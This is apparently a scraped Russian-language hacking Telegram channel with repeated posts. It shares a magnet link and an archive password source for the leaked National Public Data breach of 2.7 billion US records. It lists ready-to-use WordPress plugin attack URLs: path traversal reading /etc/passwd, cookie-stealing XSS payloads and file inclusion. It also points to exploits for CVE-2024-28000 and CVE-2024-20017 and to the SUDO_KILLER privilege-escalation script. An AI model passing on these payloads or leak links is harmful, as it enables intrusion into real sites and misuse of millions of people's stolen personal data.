NationalPublicData - BD
*
2,7 млрд записей информацией на жителей США
*
National Public Data — шарага, которая собирает жирные объемы приватной инфы, а потом продает, как в медиа так и по запросу. Там и проверка записей из криминальной базы сШа и составление биографических отчетов.
*
Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/
UPDATE
#bd
*
2,7 млрд записей информацией на жителей США
*
National Public Data — шарага, которая собирает жир
*
Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/
UPDATE
magnet:?xt=urn:btih:3caa71f3ec8cbccc6fca4feb7185da2bab149ba7&dn=NPD&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce
#bd
👍15🔥8😱5
CVE-2024-28000
*
WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)
LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1
*
POC exploit
*
WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)
LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1
*
POC exploit
🔥25👍4😱1
This media is not supported in your browser
VIEW IN TELEGRAM
Лохматый научился включать свою любимую тапалку с мышками на айпаде
Скоро рутанет
Скоро рутанет
🔥66👍20😱2
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&NAME=NAME%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/noscript_az.php?noscript_az=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
🔥41😱10👍6
This media is not supported in your browser
VIEW IN TELEGRAM
SUDO_KILLER
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов
#sudo
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов
#sudo
👍22😱1
CVE-2024-20017 Zero-Click Exploit Wi-Fi Chipsets
*
CVSS 9.8
*
Отличный разбор:
4 exploits, 1 bug: exploiting cve-2024-20017 4 different ways
*
Сам Exploit
*
CVSS 9.8
*
Отличный разбор:
4 exploits, 1 bug: exploiting cve-2024-20017 4 different ways
*
Сам Exploit
🔥16😱4👍2